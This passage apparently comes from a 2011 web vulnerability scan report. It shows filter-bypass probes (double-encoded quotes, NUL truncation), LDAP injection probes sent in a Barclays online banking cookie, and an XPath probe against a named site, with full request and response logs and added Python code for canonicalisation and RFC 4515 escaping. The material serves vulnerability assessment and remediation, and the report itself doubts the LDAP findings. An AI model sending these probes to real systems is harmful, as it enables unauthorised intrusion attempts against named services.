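1.13 and 1.15 work, and a filter that validates after canonicalising.

naive_filter() models the checks those findings describe: it looks at the
value as the web server delivered it (one percent-decode already applied)
and, like a filter written in native code, stops reading at the first NUL.
hardened_filter() decodes until the value is stable, rejects NUL bytes and
only then looks for metacharacters.  The filter logic is an assumption about
the targets; the sample inputs are the path values from the report.
"""
from urllib.parse import unquote

BLOCKED = {"'", '"'}          # the characters the filters were trying to stop


def web_server_decode(raw: str) -> str:
    """The single percent-decode a web server applies before handing over the path."""
    return unquote(raw)


def naive_filter(raw: str) -> bool:
    """Reject blocked characters, but as a native-code inspector would see them."""
    seen = web_server_decode(raw)
    seen = seen.split("\x00", 1)[0]        # C string: reading stops at NUL
    return not (BLOCKED & set(seen))


def app_second_decode(raw: str) -> str:
    """What a handler that performs its own extra URL-decode actually consumes."""
    return unquote(web_server_decode(raw))


def canonicalise(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing; refuse NUL and endless layers."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise ValueError("more than %d encoding layers" % max_rounds)
    if "\x00" in value:
        raise ValueError("NUL byte in input")
    return value


def hardened_filter(raw: str) -> bool:
    """Validate the canonical form, not the wire form."""
    try:
        value = canonicalise(raw)
    except ValueError:
        return False
    return not (BLOCKED & set(value))


if __name__ == "__main__":
    for sample in ("iBanking%2527",                               # 1.12
                   "truehitsstat.asp%2527",                       # 1.13
                   "A22EEA66F59FADF41DB11D19B3DE8B51%00'",        # 1.15
                   "A22EEA66F59FADF41DB11D19B3DE8B51"):           # benign
        print(f"{sample!r:45} naive={naive_filter(sample)!s:5} "
              f"hardened={hardened_filter(sample)!s:5} "
              f"app_sees={app_second_decode(sample)!r}")
```

The naive filter passes all three hostile values: after one decode %2527 is still %27, and the NUL hides the quote from a C-string reader. The hardened filter rejects them and still accepts the plain session id. Whether the second decode or the NUL truncation actually happens inside the targets is exactly what the manual review has to establish.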

2. LDAP injection
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace. Where arbitrary values must be accepted, escape rather than reject: RFC 4515 requires \, *, (, ) and the NUL byte to be written as \5c, \2a, \28, \29 and \00 inside an assertion value, and mature LDAP libraries provide a function that does this.
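To see why the two probes used in 2.1 (*)(sn=* and *)!(sn=*) produce different responses when a filter is built by concatenation, and why escaping stops them, here is an added example that is not part of the report. The filter template (&(uid=...)(objectClass=person)) and the uid attribute are assumptions, since the report does not show the target's query; escape_filter_value() applies the RFC 4515 rules, and is_well_formed() is a minimal syntax check just large enough to tell a valid filter from a malformed one.

```python
"""Added example (not from the report): what the two LDAP probes used in
section 2 do to a conjunctive filter, and RFC 4515 escaping that neutralises
them.

The filter template, attribute names and example uid are assumptions; the
report does not show the target's LDAP query.  is_well_formed() is a minimal
RFC 4515 syntax check, enough to show that the first probe yields a valid
filter with an extra injected term while the second yields a malformed one,
which is the asymmetry a difference-based scanner relies on.
"""
from typing import Tuple

# RFC 4515 section 3: characters that must be escaped in an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(uid: str) -> str:
    """Vulnerable: user input is concatenated straight into the filter."""
    return f"(&(uid={uid})(objectClass=person))"


def build_filter_safe(uid: str) -> str:
    """Fixed: the value is escaped so it cannot open or close a filter term."""
    return f"(&(uid={escape_filter_value(uid)})(objectClass=person))"


def _parse(f: str, i: int) -> Tuple[int, bool]:
    """Parse one parenthesised filter starting at f[i]; return (next index, ok)."""
    if i >= len(f) or f[i] != "(":
        return i, False
    i += 1
    if i < len(f) and f[i] in "&|":            # and / or: one or more sub-filters
        i += 1
        count = 0
        while i < len(f) and f[i] == "(":
            i, ok = _parse(f, i)
            if not ok:
                return i, False
            count += 1
        if count == 0:
            return i, False
    elif i < len(f) and f[i] == "!":           # not: exactly one sub-filter
        i, ok = _parse(f, i + 1)
        if not ok:
            return i, False
    else:                                      # attr=value item
        eq, close = f.find("=", i), f.find(")", i)
        if eq == -1 or close == -1 or not (i < eq < close):
            return i, False
        if "(" in f[eq + 1:close]:            # unescaped paren inside a value
            return i, False
        i = close
    if i < len(f) and f[i] == ")":
        return i + 1, True
    return i, False


def is_well_formed(filter_text: str) -> bool:
    end, ok = _parse(filter_text, 0)
    return ok and end == len(filter_text)


if __name__ == "__main__":
    for probe in ("*)(sn=*", "*)!(sn=*"):
        for build in (build_filter_unsafe, build_filter_safe):
            f = build(probe)
            print(f"{build.__name__:20} {is_well_formed(f)!s:5} {f}")
```

Unescaped, the first probe turns the filter into (&(uid=*)(sn=*)(objectClass=person)), a valid query with an attacker-chosen extra term, while the second leaves a stray ! outside any parentheses and the directory rejects it; that valid/invalid split is what makes the two responses differ. After escaping, both probes become plain assertion values and both filters are well formed, so there is nothing for the scanner to detect.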


2.1. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [WLBC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/IndividualSavingsAcctOverview.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner: inside a filter such as (&(uid=VALUE)(objectClass=...)) the first probe yields a syntactically valid filter with an extra term, and the second a malformed one.

Before pursuing this, note that the response to Request 1 re-issues the cookie (Set-Cookie: WLBC=623582380.32800.0000) and that the value has the dotted-decimal form of a load-balancer persistence cookie rather than anything an LDAP directory would consume. A balancer that discards an unparseable persistence value and assigns a fresh one will produce a response that differs from the baseline on its own, which is enough to explain the result without any LDAP query being involved.

Request 1

GET /olb/w/IndividualSavingsAcctOverview.do?action=displayIndividualSavingsAcctOverview&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:38 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r3ap-RolbClusterB-server08; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:28:37 GMT; Path=/
Connection: close
Set-Cookie: WLBC=623582380.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />
...[SNIP]...

Request 2

GET /olb/w/IndividualSavingsAcctOverview.do?action=displayIndividualSavingsAcctOverview&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:39 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:28:38 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<m
...[SNIP]...

2.2. https://ibank.barclays.co.uk/olb/w/LoanOverview.do [WLBC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/LoanOverview.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads fdddf2e8fa34970c)(sn=* and fdddf2e8fa34970c)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/LoanOverview.do?action=loanOverview||Barclayloan&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=fdddf2e8fa34970c)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:17 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r3ap-RolbClusterB-server02; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:16 GMT; Path=/
Connection: close
Set-Cookie: WLBC=623582380.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />
...[SNIP]...

Request 2

GET /olb/w/LoanOverview.do?action=loanOverview||Barclayloan&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=fdddf2e8fa34970c)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:18 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:17 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<m
...[SNIP]...

2.3. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do [WLBC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ReorderPasscodeStandalone.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/ReorderPasscodeStandalone.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:32 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r3ap-RolbClusterB-server010; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:56:31 GMT; Path=/
Connection: close
Set-Cookie: WLBC=623582380.32800.0000; path=/
Content-Length: 16046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Forgotten login details
Step 1 of 3

    </title>



















<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="DCSext.logonreport" content="FCR_FLD_LKD" />
<
...[SNIP]...

Request 2

GET /olb/w/ReorderPasscodeStandalone.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=*)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:33 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:56:32 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 16047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Forgotten login details
Step 1 of 3

    </title>



















<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="DCSext.logonreport" content="FCR_FLD_LKD" />
<meta name="DCSext.TFA" content="false" />
<meta name="WT.cg_s" content="reorder - Forgotten login details" />
<meta name="D
...[SNIP]...

2.4. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do [WLBC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ViewEStatementHistoryStep1.do

Issue detail

The WLBC cookie appears to be vulnerable to LDAP injection attacks.

The payloads 45ade80a6ceab382)(sn=* and 45ade80a6ceab382)!(sn=* were each submitted in the WLBC cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /olb/w/ViewEStatementHistoryStep1.do?action=ViewEStatementHistoryStep1&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=45ade80a6ceab382)(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:24 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06:r2ap-RolbClusterB-server05; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:24 GMT; Path=/
Connection: close
Set-Cookie: WLBC=606805164.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />
...[SNIP]...

Request 2

GET /olb/w/ViewEStatementHistoryStep1.do?action=ViewEStatementHistoryStep1&dl=true HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=45ade80a6ceab382)!(sn=*; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:26:25 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 13:26:24 GMT; Path=/
Connection: close
Set-Cookie: WLBC=640359596.32800.0000; path=/
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<m
...[SNIP]...

3. XPath injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /jcarousel'/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:23 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13254

